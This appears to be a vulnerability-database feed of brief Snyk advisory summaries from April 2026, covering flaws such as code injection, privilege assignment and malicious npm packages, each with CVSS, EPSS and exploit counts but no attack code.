Overview: org.apache.kafka:kafka-clients is a streaming platform that can publish and subscribe to streams of records, store streams of records in a fault-tolerant durable way, and process streams of records as they occur. Affected versions of this package are vulnerable to Improper Validation of...

CVSS 9.3 • AI score 5.7 • EPSS 0.00581
Exploits: 0 • References: 2
Snyk • added 2026/04/20 1:39 p.m.

Malicious Package

Overview: tailwind-text-fill is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 1:34 p.m.

Malicious Package

Overview: tailwindthml-flips is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 12:32 p.m.

Incorrect Privilege Assignment

Overview: Affected versions of this package are vulnerable to Incorrect Privilege Assignment in the memosaccesstoken function of the UpdateInstanceSetting component when manipulating the additionalStyle or additionalScript arguments. An attacker can gain unauthorized access to sensitive informatio...

CVSS 6.5 • AI score 6.6 • EPSS 0.00252
Exploits: 0 • References: 2
Snyk • added 2026/04/20 11:13 a.m.

Improper Neutralization of Special Elements in Data Query Logic

Overview: Affected versions of this package are vulnerable to Improper Neutralization of Special Elements in Data Query Logic in the Asset Handler and Aggregate Handler components. An attacker can access, modify, or disrupt sensitive data by injecting specially crafted elements into data query...

CVSS 6.5 • AI score 6.6 • EPSS 0.00232
Exploits: 0 • References: 2
Snyk • added 2026/04/20 9:16 a.m.

Arbitrary Code Injection

Overview: Affected versions of this package are vulnerable to Arbitrary Code Injection via the -env-vars process when multi-step templates are used against untrusted targets. An attacker can execute arbitrary code by injecting malicious DSL expressions. This is only exploitable if multi-step...

CVSS 7.5 • AI score 6.1 • EPSS 0.00344
Exploits: 0 • References: 2
Snyk • added 2026/04/20 9:16 a.m.

Arbitrary Code Injection

Overview: Affected versions of this package are vulnerable to Arbitrary Code Injection via the -env-vars process when multi-step templates are used against untrusted targets. An attacker can execute arbitrary code by injecting malicious DSL expressions. This is only exploitable if multi-step...

CVSS 7.5 • AI score 6.1 • EPSS 0.00344
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:34 a.m.

Malicious Package

Overview: bignum-ts-v2 is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:34 a.m.

Malicious Package

Overview: npm-doc-deploy is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:32 a.m.

Malicious Package

Overview: @tushar-br/file11 is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:32 a.m.

Malicious Package

Overview: @tushar-br/editing-pack is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this packa...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:32 a.m.

Malicious Package

Overview: @tushar-br/desktop is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:31 a.m.

Incorrect Synchronization

Overview: fschat is an open platform for training, serving, and evaluating large language model based chatbots. Affected versions of this package are vulnerable to Incorrect Synchronization in the form of synchronous invocation of the api_generate and generate_gate functions in the Worker API. An...

CVSS 8.7 • AI score 5.6 • EPSS 0.00623
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:23 a.m.

Malicious Package

Overview: krdfonts is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package authorship...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2
Snyk • added 2026/04/20 6:21 a.m.

Malicious Package

Overview: @otaxayuns/baileys is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...

CVSS 9.8 • AI score 5.7
Exploits: 0 • References: 2